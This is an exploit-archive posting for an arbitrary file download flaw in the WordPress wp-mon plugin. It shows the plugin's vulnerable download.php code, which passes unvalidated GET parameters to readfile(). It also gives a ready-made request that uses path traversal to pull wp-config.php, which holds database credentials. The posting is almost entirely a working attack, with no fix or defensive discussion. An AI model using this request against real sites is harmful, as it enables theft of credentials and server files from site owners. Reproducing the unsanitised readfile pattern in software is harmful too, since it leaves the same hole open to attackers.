Home / exploits WordPress WP-Mon Arbitrary File Download
Posted on 20 April 2015
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |-------------------------------------------------------------------------| | [+] Exploit Title:Wordpress wp-mon Plugin Arbitrary File Download Vulnerability | | [+] Exploit Author: Ashiyane Digital Security Team | | [+] Vendor Homepage : https://wordpress.org/plugins/wp-mon/ | [+] Download Link : https://downloads.wordpress.org/plugin/wp-mon.zip | [+] Tested on : Windows,Linux | | [+] Date : 2015-04-16 | [+] Discovered By : ACC3SS |-------------------------------------------------------------------------| | [+] Exploit: | | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php | | [+] Vulnerable Code : <?php header( 'Content-Type: ' . $_GET['type'] ); header( 'Content-Disposition: attachment; filename="' . $_GET['name'] . '"' ); readfile( $_GET['path'] . DIRECTORY_SEPARATOR . $_GET['name'] ); ?> | [+] http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=[File Address]&name=[File Name] | [+] | [+] Examples : http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php |-------------------------------------------------------------------------| |*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
